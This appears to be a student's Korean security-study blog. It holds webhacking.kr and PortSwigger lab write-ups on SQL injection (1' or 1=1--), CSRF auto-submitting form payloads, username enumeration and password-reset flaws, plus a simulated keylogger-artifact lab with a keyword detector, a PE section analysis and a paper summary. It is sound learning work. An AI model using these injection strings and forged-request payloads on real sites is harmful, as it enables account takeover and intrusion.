TigerDemon

webhacking.kr 3

호랑2D — Wed, 25 Mar 2026 18:47:17 +0900

https://webhacking.kr/challenge/web-03/

Challenge 3

webhacking.kr

문제를 들어가보면 아래 사진처럼 뜹니다. 따라서 문제를 풀어주었습니다.

Solved 버튼을 누르면 아래 처럼 뜹니다.

입력을 했을때 name, answer, ip가 뜹니다.

개발자 도구로 들어가 코드를 확인해보면 아래처럼 뜹니다.

이때 input type="hidden"의 의미는 중요한 정보를 안전하게 유지하는 역할을 합니다.

웹사이트 보안을 개선하기 위해 보안 토큰 또는 secret을 저장하고 제출하는 데에 사용된다.

따라서 해당 value 부분에 sql injection을 해본다. 1' or 1=1-- " 로 바꿔서 입력하고 submit을 하니 문제가 해결됐다.

8주차 keylogger 실습

호랑2D — Tue, 18 Nov 2025 21:01:51 +0900

pe_parser_project로 들어가서 cmd 열고 아래 명령어를 입력해 가상환경을 활성화시켜준다.

venv\Scripts\activate.bat

1. 흔적 생성기 만들기 - sim_keylogger_writer.py

pe_parser_project 폴더 내에 sim_keylogger_writer.py 파일을 생성하고 아래 코드를 적어준다.

# sim_keylogger_writer.py
# 안전 시뮬레이터: 키로깅 "흔적" 텍스트 파일 여러 개 생성 + 압축/인코딩 모사
import os, base64, zipfile
from datetime import datetime

outdir = os.path.join(os.getcwd(), "sim_logs")
os.makedirs(outdir, exist_ok=True)

# 1) 생성할 키로그 예시 (모의 데이터, 민감정보 금지)
samples = [
    "2025-11-05 10:01:12 | user:lee | input:loginid=student1",
    "2025-11-05 10:01:14 | user:lee | input:password=abcd1234",
    "2025-11-05 10:02:01 | user:lee | input:search=how to write report",
    "2025-11-05 10:05:23 | user:lee | input:note=final presentation slide"
]

# create multiple log files
for i, s in enumerate(samples, start=1):
    fname = os.path.join(outdir, f"kbd_{i}.log")
    with open(fname, "w", encoding="utf-8") as f:
        for j in range(20):  # 반복하여 길게 만듦
            f.write(f"{s} | entry#{j}\n")

# 2) create a zip (simulate exfil package)
zip_path = os.path.join(outdir, "collected_logs.zip")
with zipfile.ZipFile(zip_path, "w", compression=zipfile.ZIP_DEFLATED) as zf:
    for f in os.listdir(outdir):
        if f.endswith(".log"):
            zf.write(os.path.join(outdir, f), arcname=f)

# 3) create a base64-encoded blob (simulate embedding/obfuscation)
with open(zip_path, "rb") as z:
    b64 = base64.b64encode(z.read())

with open(os.path.join(outdir, "payload.b64"), "wb") as f:
    f.write(b64)

print("[*] 생성완료:", outdir)

그리고 아래 사진처럼 python sim_keylogger_writer.py로 실행해준다.

그러면 아래 파일들이 생성된 것을 볼 수 있다.

sim_logs 폴더

2. "리소스에 임베드된 것 처럼" 모사 - payload_embedded.bin

아래 사진처럼 명령어를 입력하면 실제 exe의 리소스에 embed하는 대신 단순 복사로 모사한다. 정적분석 도구로 리소스 내부 문자열 추출을 연습할 수 있다.

3. 정적 문자열 분석 - analyze_deep.py

두가지를 분석할 수 있다.

4. 간단한 인덱스 로그

아래 사진과 같이 입력하면 실제 이벤트 로그 대신 텍스트 인덱스를 만들어 '언제/ 무엇이 생성되었는지' 를 증거화한다.

5. 키워드 기반 탐지 스크립트 - find_keylog_strings.py

pe_parser_project 폴더 안에 아래 코드를 넣은 find_keylog_strings.py 파일을 만들어준다.

# find_keylog_strings.py
import os
p = os.path.join(os.getcwd(), "sim_logs")
keywords = ["password=", "loginid=", "kbd_", "collected_logs", "payload"]
for root, dirs, files in os.walk(p):
    for fn in files:
        path = os.path.join(root, fn)
        try:
            with open(path, "r", encoding="utf-8", errors="ignore") as f:
                data = f.read()
                for kw in keywords:
                    if kw in data:
                        print(f"[FOUND] {kw} in {path}")
        except Exception as e:
            print(f"[ERR] {path} : {e}")

그리고 아래와 같이 명령어를 입력해준다.

6. 파일 해시(증거식별) - Windows 명령

아래와 같이 입력하면 SHA256이 계산된다.

추가 확인

burp suite로 CSRF 실습 2

호랑2D — Tue, 18 Nov 2025 01:52:40 +0900

https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-token-being-present

Web Application Security, Testing, & Scanning - PortSwigger

PortSwigger offers tools for web application security, testing, & scanning. Choose from a range of security tools, & identify the very latest vulnerabilities.

portswigger.net

ACCESS THE LAB으로 들어가서 주어진 정보로 로그인을 하고 이메일을 바꾸면 아래 사진처럼 뜬다.

실습 1에서 했던 코드로 진행해보니 Method 에러가 떴었다. 또 GET으로 변경해서 이메일을 수정했을때도 Method 에러가 뜨는 것을 보니 Method를 POST로 하고 진행해야할 것 같다.

따라서 코드를 아래처럼 수정하고 진행하니 문제가 풀렸다.

아래 코드가 배경 코드다. action에 본인 change-email url을 복사해서 넣고 value엔 바꿀 이메일을 넣어준다.

<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="$param1value">
</form>
<script>
    document.forms[0].submit();
</script>

그리고 Store을 누리고 View exploit을 눌러 확인해주고 Deliver exploit to victim을 눌러서 공격 결과를 확인해준다.

burp suite로 CSRF 실습 1

호랑2D — Tue, 18 Nov 2025 01:52:30 +0900

https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-request-method

Web Application Security, Testing, & Scanning - PortSwigger

PortSwigger offers tools for web application security, testing, & scanning. Choose from a range of security tools, & identify the very latest vulnerabilities.

portswigger.net

위 사진처럼 뜬다. ACCESS THE LAB을 들어가면 아래 사진처럼 뜬다.

바로 제공된 정보로 로그인을 해보면 두번째 사진처럼 뜬다.

이메일을 바꿔준다. 그리고 버퍼 스위트에서 change-email로 가서 repeater로 넘어간다.

그리고 우클릭으로 'change request method'를 눌러서 POST를 GET으로 바꿔주고 이메일을 또 바꿔준다.

그냥 strawberry에서 strawberry77로 바꿨다.

Send를 눌러주고 다시 우클릭으로 Copy URL을 한 다음 직접 링크를 연다.

그럼 아래 사진처럼 바뀐 것을 확인할 수 있다.

두번째로 바꿔보는데 이땐 위에 Go to exploit server로 들어간다.

아래 코드가 기본 틀이다.

<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
    <input type="hidden" name="email" value="anything%40web-security-academy.net">
</form>
<script>
        document.forms[0].submit();
</script>

위 form action엔 아래 두번째 사진 url을 복사해서 붙여주고 value엔 바꾸고 싶은 이메일을 입력해준다.

이때 Store을 먼저 누르고 view exploit으로 결과를 확인해준다. 그리고 나서 Deliver exploit to victim을 눌러서 공격 확인을 하면 문제가 풀린다.

CSRF 정의 및 공격 기법

호랑2D — Tue, 18 Nov 2025 01:30:54 +0900

CSRF(Cross-site request forgery) 정의 //사이트 간 요청 위조

공격자가 사용자가 의도하지 않은 작업을 수행하도록 유도할 수 있는 웹 보안 취약점
공격자는 피해자의 브라우저를 이용해 인증된 세션 쿠키를 자동으로 전송하게 만들어서 피해자 대신 요청을 실행시킨다.
공격자의 링크를 피해자가 클릭하면 로그인된 상태의 세션이 이용되어 이메일 주소가 공격자 계정으로 변경될 수 있다.

CSRF가 작동하는 조건

중요한 행동

- 공격자가 유도할만한 행동이 있어야함

ex) 비밀번호/이메일 변경

피해자가 애플리케이션 내에서 특권 역할을 가지고 있다면 공격자가 데이터와 기능을 제어할 수 있게됨

쿠키 기반 세션

- 사용자 식별 정보(인증)를 *쿠키에 담긴 **세션ID 하나에만 의존하는 방식

*쿠키 : 서버가 사용자의 브라우저에 저장시킨 작은 데이터(ex) session_id).

브라우저는 같은 사이트로 요청할 때 자동으로 이 쿠키를 함께 보낸다.

**세션 : 서버가 로그인 상태 등 사용자 상태를 기억하기 위한 서버측 저장소.

보통 쿠키에 담긴 session_id로 사용자를 식별

예측 가능한 요청

- 요청에 무작위 토큰이나 값이 없음 -> 공격자가 쉽게 요청 생성 가능

작업을 수행하는 요청에 공격자가 결정하거나 추측할 수 없는 값이 있는 매개변수가 포함되어 있지 않음

정상 사용자 요청

POST /email/change HTTP/1.1
Host:vulnerable-website.com
Content-type: application/x-www-form-urlencoded
Conent-Length: 30
Cookie: session=ythwsztyeQkAPzeQ5gHgTvLyxHfsAfE

email=wiener@normal-user.com

사용자가 웹사이트에서 이메일 변경 버튼을 눌렀을 때 서버로 보내는 실제 HTTP 요청
서버는 Cookie: session=... 값을 보고 누가 보낸 요청인지(어떤 계정인지)판단
즉, 쿠키(session id)는 사용자의 로그인 상태 식별자 역할을 한다.

공격자 요청

<html>
	<body>
    	<form action="https://vulnerable-website.com/email/change" method="POST">
        <input type="hidden" name="email" value="pwned@evil-user.net" />
        </form>
        <script>
        document.forms[0].submit();
        </script>
    </body>
</html>

공격자는 이 HTML을 자기 사이트(혹은 이메일등)에 올려 피해자가 방문하게 한다.

폼은 보통 눈에 보이지 않게(hidden) 만들어져 있고, 스크립트가 즉시 submit()을 호출해 자동으로 POST 요청을 보낸다.

표면상 요청 내용을 정상 요청과 동일(같은 URL, 같은 파라미터 구조)이다. - 단지 email 값이 공격자가 원하는 값으로 바뀌었을 뿐.

과정

피해자가 로그인된 상태(브라우저에 로그인 쿠키를 가지고 있음)로 공격자 페이지를 방문
공격자 페이지의 스크립트/폼이 취약 사이트로 요청을 보냄
브라우저는 같은 도메인으로의 요청에 대해 자동으로 쿠키를 포함 (사용자가 수동으로 첨부한 게 아님)
서버는 요청에 포함된 세션 쿠키를 보고 정상 사용자가 보낸 요청으로 판단하여 이메일을 변경

-> 결과 : 피해자의 이메일이 공격자 주소로 바뀌고, 계정 탈취(비밀번호 재설정 등)로 이어질 수 있음

브라우저가 쿠키를 자동으로 포함시키는 특성 때문에, 공격자는 사용자가 모르는 사이에 '인증된' 요청을 위조할 수 있다.

CSRF 방어 방법

1. CSRF Token(CSRF 토큰)

가장 효과적인 방법

서버가 매 요청마다 랜덤하고 예측 불가능한 토큰(문자열)을 생성해서 폼이나 요청에 포함시킴

사용자가 폼을 제출할 때, 같은 토큰을 함께 보내야 서버가 요청을 인정함

공격자는 이 토큰 값을 알 수 없기 때문에, 피해자 대신 올바른 요청을 만들 수 없음

2. SameSite Cookie

브라우저 측 방어 가능

쿠키가 다른 사이트에서 오는 요청에 포함되지 않도록 제한하는 설정(즉, 외부 페이지에서 자동으로 요청을 보낼 수 없음 -> CSRF 차단)

3. Referer-based Validation(리퍼러 검증)

요청의 출처(Referer 헤더)를 확인해서 같은 도메인에서 보낸 요청만 허용하는 방법

공격자 사이트(evil.com)에서 온 요청이면 Referer 값이 다르기 때문에 차단 가능

하지만 일부 브라이저나 프록시가 Referer를 제거할 수 있어 신뢰도가 낮음

XSS vs CSRF

XSS

공격자가 악성 스크립트(JavaScript)를 웹페이지에 삽입해 브라우저 내에서 실행시킴

사용자가 악성 스크리트가 삽입된 페이지를 열면 공격 발생

정보를 훔치거나 브라우저 내부 조작

공격자가 '피해자의 브리우저 안'에서 직접 행동함

-> '브라우저 내부 해킹'

양방향(two-way)

공격자가 브라우저 안에서 코드를 실행하므로, 요청-응답 모두 제어 가능

CSRF

공격자가 사용자 대신 요청을 보내도록 속임(피해자의 브라우저 이용)

사용자가 로그인된 상태로 공격자 사이트에 접속하면 공격 발생

서버에 잘못된 요청을 보내게 만듦

공격자가 '피해자의 브라우저를 이용해서 서버에 요청을 보냄'

-> '피해자 대신 요청 보내기'

단방향(one - way)

공격자는 요청을 보내게 할 수는 있지만, 응답을 볼 수 없음

-> '요청만 유도'

7주차 notepad.exe를 이용한 PE 구조 분석 실습

호랑2D — Wed, 12 Nov 2025 04:04:56 +0900

1차 분석 : pe_parser.py

추가된 파일

추가된 파일 코드

2차 분석 : analyze_deep.py

추가된 파일

파일명	의미
deep_report.md	전체 분석 요약
sections.txt	프로그램 안에 들어있는 섹션 목록 - 비정상 섹션 이름 있는지 확인
fothk_strings.txt	fothk 섹션 안에서 뽑은 글자들 - 이상한 문자열 찾기
imports.json	프로그램이 어떤 함수(API) 쓰는지 리스트 - 위험 API 확인
notepad_fothk_dump.bin	fothk 섹션 그자체 - 실행 금지
sha256.txt	파일 고유 지문 - 평판 조회시 사용

deep_report.md

# Deep Static Analysis Report: notepad
- path: C:\Windows\System32\notepad.exe
- analyzed_at: 2025-11-10T21:54:02.879495
- sha256: 1552f6a579b77b61460df56cb4b2ce0a34fe96b6176829d7916275b806edc2bb

## Sections
- .text | vsize:157410 | raw:159744
- fothk | vsize:4096 | raw:4096
- .rdata | vsize:42456 | raw:45056
- .data | vsize:10048 | raw:4096
- .pdata | vsize:4620 | raw:8192
- .didat | vsize:248 | raw:4096
- .rsrc | vsize:123344 | raw:126976
- .reloc | vsize:848 | raw:4096

## fothk strings (first 200 lines)

## Imports (partial)

section.txt

.text | vsize:157410 | raw:159744
fothk | vsize:4096 | raw:4096
.rdata | vsize:42456 | raw:45056
.data | vsize:10048 | raw:4096
.pdata | vsize:4620 | raw:8192
.didat | vsize:248 | raw:4096
.rsrc | vsize:123344 | raw:126976
.reloc | vsize:848 | raw:4096

fothk_strings. txt -> 비어있다

imports.json -> 비어있다.

위 두 파일이 비어있는 주요 원인

원인	설명
임포트 없음 혹은 패킹/ 난독화	악성코드나 패킹된 PE 파일은 strings, imports 영역에 정보가 보이지 않도록 만들기도 함. 문자열 추출 시 암호화, 압출, 난독화 등으로 실제 ascii 문자열이 섹션에 존재하지 않을 수 있음
툴의 한계 또는 추출 실수	분석 스크립트/ 툴이 올바르게 섹션을 파싱하지 못하거나, 파일 권한 문제, 변조된 PE 헤더 등으로 오류가 나서 빈파일이 생성될 수 있음
실제로 널 데이터	문자열 데이터가 실제로 없을 수 있음

분석

섹션	설명
.text	코드 영역으로 프로그램의 주요 실행코드 포함
fothk	일반적인 PE 표준에는 없는 비표준 섹션명 - 커스텀 데이터 혹은 코드 등으로 추정
.rdata	읽기전용 데이터
.data	전역 데이터
.pdata	예외 처리 데이터
.didat	동적 데이터
.rsrc	리소스
.reloc	재배치 정보

이때 fothk 세션이 실제로 존재하며 여기에 악성 코드 흔적이나 난독화된 문자열 등 코드가 들어있을 수 있다.

=> 비정상적인 fothk 섹션이 존재함을 확인할 수 있으며 문자열 덤프 분석 필요

[논문 분석]네트워크 CCTV와 스마트 단말기를 연동한 이동체 추적 시스템

호랑2D — Wed, 12 Nov 2025 03:07:33 +0900

https://scienceon.kisti.re.kr/srch/selectPORSrchArticle.do?cn=JAKO201302255801904

[논문]네트워크 CCTV와 스마트 단말기를 연동한 이동체 추적 시스템

본 논문에서는 네트워크 CCTV와 스마트 단말기를 연동한 이동체 추적 시스템을 소개한다. 긴급 상황 발생 시 신고자의 단말기는 GPS 위치 정보를 획득하고 이를 중앙 서버로 전송한다. 중앙 서버

scienceon.kisti.re.kr

서론

범죄를 예방하기 위해 네트워크 CCTV를 설치하였지만 소수 인원이기에 실시간 감시가 어려워져 CCTV는 범죄 예방보다 범죄 발생 후 대처용으로 사용되고 있다. 최근 스마트 단말기는 GPS 송수신기를 내장하고 LBS( Location Based Services) 기능을 활용하여 단말기의 위치측위 값을 정확히 획득할 수 있다.

본 논문에선 스마트 단말기의 GPS와 네트워크 CCTV를 연동하여 범죄 발생 후 대처용으로 사용되는 CCTV 문제를 개선하고자 한다.

GPS 위치 파악 -> 피사체 추적 촬영 -> 신고 장소 파악 및 출동

연구 동향

2.1 IP Camera

Network IP 기반에서 영상을 전송

강점

CCTV 설치의 확장성이나 획득한 영상 정보로 접근하는 방식의 유연성

음향까지 녹취 가능

PTZ(Pan/ Tilt/ Zoom) - 360도, 180도, 45도 등 상하좌우로 회전시키고 초점 조절하여 선명하게 영상 획득 가능

CCTV와 IP camera의 장단점

2.2 지능형 영상분석

영상의 정보를 분석하여 자동으로 이상 행위를 탐지하는 기술

일반적인 수행 단계
영상의 배경 영역 분리단계
객체 식별 단계
객체 추적 단계
사전 정의된 규칙을 기반으로 이벤트를 탐지하는 *이벤트 탐지 단계

*이벤트 탐지 단계

영상 속 객체가 특정 영역에 무단 침입하거나 잘못된 방향으로 진행하는 것을 방지하기 위해 사용

+ BI 이벤트

영상 정보를 분석하여 객체의 수, 체류 시간 등 비즈니스에 도움될 만한 메타데이터 제공

ex) 자동차 번호판, 군중 속 범죄자 식별, 공항의 폭탄 식별에 사용

2.3 GPS(Glocal positioning system)

미국 국방부에서 개발한 24개의 GPS위성과 GPS수신기가 통신하여 자 신의 절대 위치와 시간 정보 등을 수신 하는 시스템

하지만 거리와 기후로 인해 잡음이 생기고 신호 크기 또한 약해져서 정확한 위치 정보를 수신하기 까지 시간이 걸림

-> 이를 극복하기 위해 국내 이동통신사에서는 *A-GPS 지원

*A-GPS 측위 방식

SLP 간에 OMA SUPL 규격을 이용하여 위치 계산과정을 수행하며 SUPL POS를 통한 메시지 송수신으로 빠르고 정확하게 파악 가능

SLP(SUPL Location Platform) : GPS 수신기를 내장한 이동단말기와 이동통신망 내에 설치한 위치 측위 서버

OMA SUPL(Secure User Plane Location) : 위치 계산과정 수행

SUPL POS : (RRLP(Radio Resource Locatiojn Protocol))를 내장한 이중 A-GPS 측위를 위한 프로토콜

2.4 GCM

Pull Service : (기존) 클라이언트가 관심 정보를 서버에 요청 -> 서버가 인식하여 요청한 관심 정보를 클라이언트에게 전송

Push Service : 서버가 클라이언트의 관심 정보를 해당 클라이언트에게 제공

장점

클라이언트가 관심정보를 얻기 위해 서버에게 별도의 정보 요청 필요 X

Google에서 개발한 Push Service

1. 클라이언트와 GCM 서비스가 직접 통신하는 방식

2. 별도의 서버를 통해 3rd Party Server GCM 방식

3rd Party Server GCM 방식 과정

단말기는 GCM 서비스에게 자신의 *고유 ID 요청
고유 ID를 요청한 단말기에게 고유 ID 공유
고유ID를 획득한 단말기(좌)는 서버와 자신의 DB에 고유ID 저장
단말기(우)가 서버에게 단말기(좌)의 고유ID와 전달할 데이터를 전송하면 서버는 수신한 단말기(좌)의 고유ID와 데이터를 *GCM 서비스에 전송

*고유 ID : 안드로이드 기반 모든 단말기를 구분할 수 있는 시리얼 번호

*GCM 서비스 : 기지국을 통해 고유ID를 갖는 단말기(좌)를 찾고 데이터를 전송하여 단말기(좌)는 데이터 수신 가능

=> 단말기의 다른 기능과 결합되거나 어플리케이션에 접목되며 본 시스템에선 보호자의 스마트 단말기에 신고자의 영상 정보를 전송하는데 사용

3. 시스템 설계 및 동작

3.1 시스템 설계

중앙 서버, 스마트 단말기의 애플리케이션, IP Camera(이하 CCTV)

이동체 촬영 시스템 구상도

시스템	역할
중앙서버	영상 저장 및 전송, 위치 정보 저장 및 전송, CCTV 위치관리, 스마트 단말기 ID 관리 담당
영상 저장 및 전송부	CCTV 영상 저장기능과 전송기능을 담당
위치정보저장 및 전송부	신고자의 CCTV호출 위치와 시간을 저장하고 위험지역으로 저장
CCTV 관리부	CCTV가 설치된 위치와 촬영이 가능한 범위를 저장

과정

스마트 단말기의 애플리케이션에서 CCTV 호출을 요청
CCTV가 호출되고 신고자를 추적촬영
이때 획득한 영상을 유관기관, 보호자, 신고자에게 전송
유관 기관은 사건의 장소, 상태, 시간 등을 정확하게 파악하여 조치

애플리케이션 기능

CCTV 호출 : 호출 버튼을 클릭하면 GPS 위성으로부터 위치 정보(위도, 경도, 고도)를 획득하며 위치 정보 저장 서버로 송신하고 CCTV 위치 관리부가 호출한 CCTV의 영상 획득

주변탐색

현재위치 탐색 : GPS위성으로부터 위치 정보를 1회 획득하고 이를 위치 정보 저장 서버로 송신 -> 수신한 위치 정보 주변 위험 지역 정보 전송

목적지 탐색 : 신고자의 목적지를 입력받아 위치 정보 저장 서버로 송신 -> 목적지 주변의 위험 지역 정보 전송

GCM 수신 기능 : 보호자 또는 유관기관에게 신고자의 영상 전송

3.2 시스템 동작

위급 상황 발생시

신고자는 위급 상황 발생시 어플리케이션의 CCTV 호출 버튼을 눌러 GPS 위치 값을 중앙 서버로 전송
서버에서 수신한 GPS 위치 값을 위험 지역으로 저장하고 추적 촬영 가능한 CCTV 탐색 후 신고자 위치와 추적 명령 전송
CCTV 관리자 화면에 경고음을 내어 유관기관 및 관리자가 빠르게 대응하도록 유도
CCTV는 자신의 감시 위치와 신고자 위치 계산하여 추적 촬영
추적 촬영한 영상은 서버로 전송 및 저장
신고자의 보호자로 등록된 단말기로 추적 영상 전송

논문 선정 이유

긴급상황 발생 시 신고자의 GPS를 전송하고 중앙 서버는 위치를 확인하고 촬영이 가능한 CCTV를 선택하여 추적 촬영 명령을 한 후 보호자 및 유관 기관에 해당 CCTV 영상을 전송하여 신속한 대처를 할 수 있게 한다.라는 요약 글을 읽고 흥미가 생겨서 정리하게 되었다.

배운점 및 느낀점

흥미로운 논문이었다. CCTV가 지금은 많이 설치되어서 조금 더 디벨롭해서 실제로 구현되면 좋을 것 같다. 우선 보안이 정말 중요할 것 같다 최근에 SNS에서 한 사람이 지하철에서 빈 자리를 찾기 위해 사람들의 핸드폰 뭔가를 파악하면서 핸드폰 기종이랑 여러가지를 확인하는 앱을 혼자 개발해서 그걸 사용하는 걸 올렸었다. 그걸 보고 정말 쉽게 개인 정보를 알 수 있겠다고 생각했다. 이 앱도 사용자의 단말기 ID와 더불어 위치 정보까지 자세하게 나올 수 있기에 해킹당하면 정말 위험할 것 같다. 그리고 신고자와 범죄자?가 서로 반대로 가면 어떻게 할건지 궁금하다 영상이 여러개 저장되는 걸까 보통 CCTV가 한대밖에 없을 것 같은데 그럼 어떻게 추적을 할건지 만약 2개라도 하더라도 하나하나 어떻게 분리해서 추적 명령을 할건지 궁금하다.

burp suite로 Authentication vulnerabilities 실습 2

호랑2D — Mon, 10 Nov 2025 21:12:16 +0900

https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-broken-logic

Web Application Security, Testing, & Scanning - PortSwigger

PortSwigger offers tools for web application security, testing, & scanning. Choose from a range of security tools, & identify the very latest vulnerabilities.

portswigger.net

위 링크로 들어가면 아래와 같은 화면이 뜬다.

ACCESS THE LAB을 누르면 아래와 같이 블로그 창이 뜬다.

My account로 들어가서 랩 홈에서 보여준 username : wiener / password : peter 을 적어서 보내면 두번째 사진처럼 뜬다.

Forgot password에 wiener을 보내면 두번째 사진처럼 뜬다. 그리고 Email client 버튼을 누른다.

그럼 아래 사진과 같이 뜬다. 여기서 Body 부분에 있는 링크로 들어가면 두번째 사진처럼 뜬다.

이때 버퍼 스위트로 가서 보면 username에 해당 이름이 있는데 혹시나 싶어서 수정해보았다.

개발자 도구로 들어가서 wiener을 carlos로 변경하고 비밀번호를 1234로 바꿔보았다.

그리고나서 username : carlos / password : 1234 로 로그인을 해봤더니 풀렸다.

burp suite로 Authentication vulnerabilities 실습 1

호랑2D — Mon, 10 Nov 2025 17:00:28 +0900

https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses

Web Application Security, Testing, & Scanning - PortSwigger

PortSwigger offers tools for web application security, testing, & scanning. Choose from a range of security tools, & identify the very latest vulnerabilities.

portswigger.net

위 문제 링크로 들어가면 아래와 같이 뜬다.

ACCESS THE LAB 버튼을 클릭하면 아래 사진처럼 뜬다.

위 사진 속 My account로 가서 id에는 test 비밀번호에는 1234를 입력했다.

버퍼 스위트로 가서 로그인했던 POST로 가서 확인하고 Send to Intruder 버튼을 누른다.

그리고 test를 드래그한 후 ADD 버튼을 누른다. 이후에 첫 문제 페이지에 있는 Candidate usernames를 클릭한 후 해당 내용을 복사한다. 이후에 paste 버튼을 눌러서 붙여넣기를 해주고 Start Attack을 눌러준다.

그럼 아래와 같이 Length의 길이가 다른 것을 확인할 수 있다.

ar을 username에 넣어서 보내보면 아까와 다르게 Incorrect password라고 뜬다.

이제 비밀번호를 알아보려고 한다. 아까처럼 password 부분을 드래그한 후 ADD 버튼을 누른 후 Candidate passwords를 복사한 뒤 Paste 버튼을 눌러 붙여넣기를 해준다. 그리고 Start Attack을 누른다.

아까처럼 Length 부분이 다른 문자를 확인할 수 있다.

ar과 baseball을 입력해서 보내보면 문제가 풀린 것을 확인할 수 있다.

Authentication vulnerabilities 정의 및 공격 기법

호랑2D — Mon, 10 Nov 2025 16:42:24 +0900

Authentication vulnerabilities 정의

공격자가 민감한 데이터와 기능에 접근하도록 허용할 수 있게 하는 보안 결함

추가적인 공격 표면을 노출해 더 큰 침투로 이어질 수 있다. 이런 이유로 인증 취약점을 식별하고 악용하는 방법, 일반적인 조치를 우회하는 방법을 배우는 것이 중요하다.

해당 주제에서 설명하고자 하는 것

웹 사이트에서 흔히 쓰이는 인증 메커니즘들
이들 메커니즘에서 발생할 수 있는 잠재적 취약점들
서로 다른 인증 메커니즘 자체에 내재된 취약점(설계적 한계)
잘못 구현했을 때 도입되는 전형적 취약점들
자체 인증 메커니즘을 가능한 한 견고하게 만다는 방법

인증(Authentication)이란?

사용자나 클라이언트의 신원을 검증하는 과정

웹사이트는 인터넷에 연결된 모든 사람들에게 잠재적으로 노출되어 있기 떄문에 강력한 인증 매커니즘은 효과적인 웹 보안을 위해 필수적이다.

1. Something you know(지식 기반 요인 - Knowledge factors)

ex) 비밀번호, 보안 질문의 답 등

2. Something you have(소유 기반 요인 - Possession factors)

ex) 모바일폰, OTP 토큰, 보안카드 등 물리적 장치

3. Something you are or do(고유 기반 요인 - Inherence factors)

ex) 지문, 얼굴 인식, 음성, 행동 패턴

-> 인증 메커니즘은 위의 한 가지 이상 요인을 검증하기 위해 다양한 기술에 의존한다.

Authentication은 사용자가 자신이 주장하는 사람인지 확인하는 과정

Authorization(인가)은 사용자가 어떤 행동을 할 수 있는지(권한이 있는지)를 검증하는 과정

순서

Strawberry123이라는 사용자 이름으로 웹 사이트에 접속
(인증 Authentication) - 그 계정을 만든 같은 사람인지 여부 확인
인증 완료
(인가 - Authorization) - 받은 권한에 따라 수행할 수 있는 동작 결정

인증 취약점 발생 원인 및 영향

발생

1. 인증 매커니즘이 약할 때

-> 무차별 대입(brute-force) 공격을 적절히 방어하지 못할 때 발생

2. 로직 결함 또는 잘못된 코딩(구현 오류)이 있을 때

-> 공격자가 인증 과정을 완전히 우회할 수 있게 되는 경우

영향

다른 사용자의 계정을 아래와 같은 상황으로 침입한다고 가정
만약 공격자가 인증 절차를 우회
무차별 대입(brute-force) 공격
-> 그 계정이 가진 모든 데이터와 기능에 접근 가능

만약 공격자가 "시스템 관리자(system administrator)"처럼 높은 권한을 가진 계정을 탈취한다고 가정
-> 애플리케이션 전체를 완전히 장악하고 내부 인프라까지 접근 가능

만약 공격자가 권한이 낮은 일반 사용자 계정을 탈취한다고 가정
-> 공격자는 원래 접근할 수 없어야 할 "상업적으로 민감한 정보(business confidential data)"에 접근 가능